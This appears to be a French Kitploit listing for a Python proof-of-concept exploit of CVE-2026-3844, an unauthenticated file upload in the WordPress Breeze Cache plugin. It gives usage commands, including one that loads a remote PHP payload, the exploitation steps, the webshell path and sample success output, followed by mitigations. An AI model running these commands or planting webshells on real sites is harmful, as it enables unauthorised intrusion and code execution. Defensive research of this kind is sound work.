Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3844 — Preuve de concept en Python pour CVE-2026-3844, un téléversement de fichier arbitraire non authentifié dans le plugin WordPress Breeze Cache, permettant l'exécution de code à distance. Inclut la détection, l'exploitation et la vérification de la webshell. | Kitploit
Outils/GitHubGitHub/sahmsec/cve-2026-3844
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Preuve de concept en Python pour CVE-2026-3844, un téléversement de fichier arbitraire non authentifié dans le plugin WordPress Breeze Cache, permettant l'exécution de code à distance. Inclut la détection, l'exploitation et la vérification de la webshell.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-3844 — WordPress Breeze Cache Téléversement de fichier non authentifié

Aperçu

Ce dépôt contient un script de preuve de concept (PoC) en Python pour démontrer une vulnérabilité de téléversement arbitraire de fichier non authentifié affectant le plugin WordPress Breeze Cache <= 2.4.4.

⚠️ Ce projet est destiné strictement aux tests de sécurité autorisés, à la recherche pédagogique et à la validation défensive uniquement.


Informations sur la vulnérabilité

  • Identifiant CVE : CVE-2026-3844
  • Plugin concerné : Breeze Cache pour WordPress
  • Versions concernées : <= 2.4.4
  • Type de problème : Téléversement arbitraire de fichier non authentifié
  • Impact : Exécution de code à distance (RCE) potentielle
  • Vecteur d'attaque : À distance / Non authentifié

La vulnérabilité exploite la fonctionnalité de mise en cache des gravatars de Breeze Cache pour stocker des fichiers contrôlés par l'attaquant dans le répertoire de cache de WordPress.


Fonctionnalités

  • Mode de détection de la vulnérabilité
  • Flux d'exploitation automatisé
  • Prise en charge de la vérification des webshells
  • Sortie terminale colorée
  • Chargement de payload à distance
  • Vérifications du téléversement
  • Journalisation de sortie facultative

  • Prérequis

    • Python 3.8+
    • pycurl
    • termcolor

    Installer les dépendances :

    root@kitploit:~
    pip install pycurl termcolor
    

    Fichiers

    FichierDescription
    CVE-2026-3844.pyScript d'exploitation PoC principal
    CVE-2026-3844.yamlModèle/configuration YAML

    Utilisation

    Vérifier si la cible semble vulnérable

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com --check-only
    

    Exécuter l'exploit

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com
    

    Payload personnalisé

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
    

    Enregistrer les résultats

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -o results.txt
    

    Comment cela fonctionne

    Le script effectue les étapes suivantes :

    1. Détecte la version de Breeze Cache installée
    2. Vérifie si la version du plugin est vulnérable
    3. Soumet une requête de commentaire WordPress falsifiée
    4. Exploite la gestion des gravatars du cache Breeze
    5. Attend la génération du cache
    6. Vérifie si le fichier téléversé devient accessible
    7. Teste la réactivité du payload

    Chemin vulnérable

    Le payload téléversé peut devenir accessible depuis :

    root@kitploit:~
    /wp-content/cache/breeze-extra/gravatars/
    

    Remarques

    Une exploitation réussie peut dépendre du paramètre Breeze suivant activé :

    root@kitploit:~
    Héberger les fichiers localement - Gravatars
    

    Si la fonctionnalité est désactivée, les tentatives d'exploitation peuvent échouer.


    Exemple de sortie

    root@kitploit:~
    [+] Cible VULNÉRABLE (Breeze v2.4.4)
    [+] Commentaire publié avec succès
    [+] Fichier trouvé à : http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
    [+] CHAÎNE DE VÉRIFICATION TROUVÉE - EXPLOIT RÉUSSI !
    

    Avertissement

    Ce dépôt est fourni pour :

    • La recherche en sécurité
    • Des fins pédagogiques
    • Les tests d'intrusion autorisés
    • Les évaluations de sécurité défensives

    N'utilisez pas ce projet contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.

    L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce projet.


    Recommandations d'atténuation

    Les administrateurs de sites web devraient :

    • Mettre à jour Breeze Cache vers la dernière version corrigée
    • Désactiver les fonctionnalités de mise en cache de fichiers inutiles
    • Restreindre les téléversements de fichiers dangereux
    • Désactiver l'exécution PHP dans les répertoires de cache
    • Surveiller /wp-content/cache/ pour détecter les fichiers suspects
    • Déployer un pare-feu applicatif web (WAF)
    • Appliquer une validation stricte côté serveur

    Déclaration d'objectif pédagogique

    Cette preuve de concept a été créée pour aider :

    • Les chercheurs en sécurité
    • Les testeurs d'intrusion
    • Les équipes bleues
    • Les administrateurs WordPress
    • Les développeurs

    à comprendre les risques de sécurité associés aux mécanismes de mise en cache non sécurisés et aux téléversements arbitraires de fichiers.


    Références

    • Base de données CVE
    • Avis de sécurité WordPress
    • Directives de sécurité OWASP sur le téléversement de fichiers
    • Documentation du plugin Breeze Cache

    Auteur

    Projet de recherche en sécurité / pédagogique

    Télécharger l’outil